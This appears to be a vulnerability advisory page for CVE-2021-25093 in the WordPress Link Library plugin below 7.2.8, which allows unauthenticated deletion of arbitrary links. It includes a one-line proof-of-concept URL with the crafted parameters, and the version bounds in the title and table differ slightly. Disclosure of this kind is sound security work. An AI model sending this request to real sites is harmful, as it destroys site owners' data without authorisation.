Lucene search
Krzysztof ZającWPVDB-ID:7A7603CE-D76D-4C49-A886-67653BED8CD3HistoryDec 30, 2021 - 12:00 a.m.
Link Library < 7.2.8 - Unauthenticated Arbitrary Links Deletion
2021-12-3000:00:00
Krzysztof Zając
wpscan.com
7
0.001 Low
EPSS
Percentile
41.6%
The plugin does not have authorisation in place when deleting links, allowing unauthenticated users to delete arbitrary links via a crafted request
PoC
https://example.com/?post_type=link_library_links&ll60reupdate;=1
| CPE | Name | Operator | Version |
|---|---|---|---|
| link-library | lt | 7.2.9 |
Related
prion
prion
Cross site request forgery (csrf)
2022-02-01 13:15:00
wpexploit
wpexploit
Link Library < 7.2.8 - Unauthenticated Arbitrary Links Deletion
2021-12-30 00:00:00
cnvd
cnvd
WordPress Link Library plugin arbitrary link deletion vulnerability
2022-03-11 00:00:00
cve
cve
CVE-2021-25093
2022-02-01 13:15:09
patchstack
patchstack
nvd
nvd
CVE-2021-25093
2022-02-01 13:15:09
cvelist
cvelist